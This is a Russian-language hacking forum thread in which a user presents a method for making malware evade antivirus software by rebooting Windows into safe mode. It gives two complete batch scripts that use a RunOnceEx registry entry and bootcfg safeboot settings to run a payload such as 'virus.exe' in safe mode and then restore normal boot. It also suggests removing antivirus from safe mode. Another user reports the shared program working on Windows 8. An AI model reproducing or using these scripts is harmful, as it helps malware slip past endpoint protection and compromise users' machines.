Запускаем вирус в безопасном режиме и актуально-ли это ?

[X-Shar]

Всем привет, обычно такими делами не занимаюсь, но где-то на прошлой неделе что-то заморочился, а как можно обойти антивирус, да и вообще любую защиту, не знаю на хер мне это нужно, но что-то не смог сдержаться...

Хотелось найти какой-либо универсальный способ, который-бы действовал на все средства защиты, ну или почти на все ! ;)

Что в этоге получилось, а я подумал, почему-бы не запускать наш зловред в безопасном режиме, а почему-бы и нет, ведь в безопасном режиме не запускаются встроенные средства защиты винды, и самое главное ненавистные антивирусы ! :)

Суть идеи вот в чём:

Вирус при первом запуске перезапускает систему в безопасном режиме не выполняя при этом каких-либо опасных, либо подозрительных действий, далее уже в безопасном режиме делай, что хочешь ! ;)

Думал я как это реализовать, пока нашёл решение при помощи батников, что я сделал, при первом запуске вирус создаёт батник и исполняет его, тем самым перезагружает систему в сейф мод., и от туда-уже запускает себя и делает что нужно...

Ну думаю хватит филосовствовать, перейдём к делу, хочу привести код батника, который получился, в общем-то всё просто:

Скопировать в буфер обмена

@ECHO OFF
ECHO Rebooting into Safe Mode
SET LMROEX=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
REG ADD %LMROEX% /V TITLE /D "LM-ROEX SafeMoe" /f
REG ADD %LMROEX%\101 /vE /d "SafeMoe Installs" /f
REG ADD %LMROEX%\101 /v 1 /d С:\StartVirus.bat /f
bootcfg /raw /a /safeboot:minimal /id 1
SHUTDOWN -r -f -t 01

В моём случае, я запускал ещё и второй батник С:\StartVirus.bat, но вы можете сразу запускать свой вирус...

Хочу привести код второго батника, который создавал мой вирус и расскажу для чего он нужен:

Скопировать в буфер обмена

@ECHO OFF
ECHO Safe Mode Installs
Start C:\virus.exe
ECHO Rebooting into Normal Mode
bootcfg /raw /fastdetect /id 1
SHUTDOWN -r -f -t 01

Ну во первых это запуск уже вируса, код Start C:\virus.exe

Ну а во вторых обратите внимание на код:

Скопировать в буфер обмена

bootcfg /raw /fastdetect /id 1
SHUTDOWN -r -f -t 0

Это ни что иное, как восстановление нормальной загрузки винды ! ;)

Все батники протестированы на хрюше и 100% работают, на 7-8 не проверял !

В этоге можем реализовать такое в любой системе программирования, хоть плюсы, хоть делфи, хоть в чём ещё, т.к. батники это всего-лишь вспомогательный функцианалл, а вирус уже может делать, что угодно, вплоть до удаления антивирусов из системы !

И ещё хочу добавить, вовсе не обязательно создавать батники, можно выполнять эти команды из оболочки вируса, в общем можете делать, как хотите, как скажет ваша фантазия ! ;)

У меня всё, при желании можете развить эту тему ! ;)

З.Ы. Выкладывал эту тему на одном хакерском ресурсе, где профессионально создают малваре, но что-то там сказали, что всё это херня и не актуально, хочется узнать мнение здесь, если есть знающие люди !
Ведь в сейф моде можно реализовать функционалл удаления АВ !

ДЛЯ ОЗНАКОМЛЕНИЯ И ОБСУЖДЕНИЯ !!!

 

[Антоха]

X-Shar, а дай мне его попробовать на "восьмёрке".Неужели раньше никому в голову не приходила такая мысль (о запуске через сейф мод)...думаю разработчики виндовс и антивирусов,должны были принять во внимание такую возможность проникновения вируса в систему.
P.S.Честное пионерское,что буду использовать лишь в целях ознакомления.

 

[X-Shar]

X-Shar, а дай мне его попробовать на "восьмёрке".Неужели раньше никому в голову не приходила такая мысль (о запуске через сейф мод)...думаю разработчики виндовс и антивирусов,должны были принять во внимание такую возможность проникновения вируса в систему.
P.S.Честное пионерское,что буду использовать лишь в целях ознакомления.

Сделаю проще, изменил свой вирус, убрав в нём всю деструктивную активность, сейчас вирус запускает блокнот и вордпат в сейвмоде и возвращает всё как было...

Сделал это, т.к. этот сайт нужен не для написания малваре, а для их исследования, обсуждения и защиты от них ! ;)

Выкладываю с исходником, писал на C++ Bulder 6, старьё конечно, но он у меня на компе установлен, ну и за сорцы особо не ругайте, хоть прога и простецкая, особо не напрягался, может можно-было сделать круче, я тоже пока учусь, исходник можете глянуть ! ;)

Ну и обратите внимание на дизайн моей проге, уже дал заявку на патент:

Пароль:111

ТЕСТИТЬ ТОЛЬКО НА ВИРТУАЛКЕ !!!

 

[X-Shar]

Запускать Project1.exe будут вопросы задавайте !

 

[X-Shar]

И ещё на 7-ке работает, если залочится boot.ini, то указанные файлы запустятся после перезагрузки, даже до запуска некоторых АВ !

Правда доктор лочит boot.ini это во первых, а во вторых потом найдёт вирус в процессах !

Ну и срабатывает проактивка, можете проверить свою проактивку ! ;)

Лучше конечно на виртуалке !

 

[X-Shar]

ВАЖНО: чуть не забыл, при нажатии на кнопку, вирус автоматически ребутнит ПК, так-что осторожно и тестировать на виртуалке и грамотным и опытным пользователям !

 

[Антоха]

Попробовал на голой "восьмёрке",без сторонней защиты.Поначалу завозмущался смарт скрин,отключил его.При запуске не от администратора-выдаёт ошибку.При запуске от администратора-вирус благополучно внедряется:).Сча подумаю какой антивирь поставить покруче для эксперимента.
З.Ы.Мля,это какой-то писец когда на виртуалке и на основной машине-"восьмёрки".В виртуалке нихера не включить отовсюду вылезает сцуко с основной))Поставлю Касперского и посмотрю,как ему понравиться творение X-Shar(a).

 

[Антоха]

ну и за сорцы особо не ругайте

Олег,это ты так прикалываешься над бедными форумчанами (мега-изящный троллинг)?Тут такие зубры программного кода собрались,что ой-ой-ой;)Сейчас все ошибки твои наружу вытащат.

Ну и обратите внимание на дизайн моей проге, уже дал заявку на патент:

За дизайн отдельный респект.Все бы кодеры такими добрыми были,написал бяку и на ней кнопочку с предупреждением.А дизайн крутой...минималистический..в моде такой нынче.

 

[X-Shar]

Ну и как ?

Кто-нить тестил, проактивка всю малину портит, ну и УАК этот тоже кстати...

 

[Антоха]

Каспер одобрил твоё творение.Молча разрешил запуск приложения из неизвестного источника с правами администратора.Он наверное видит отсутствие деструктивного кода.Вообщем всё работает на ура...теперь заместо блокнота и вордпада осталось водородную бомбу прикрутить и будет отличная машинка)))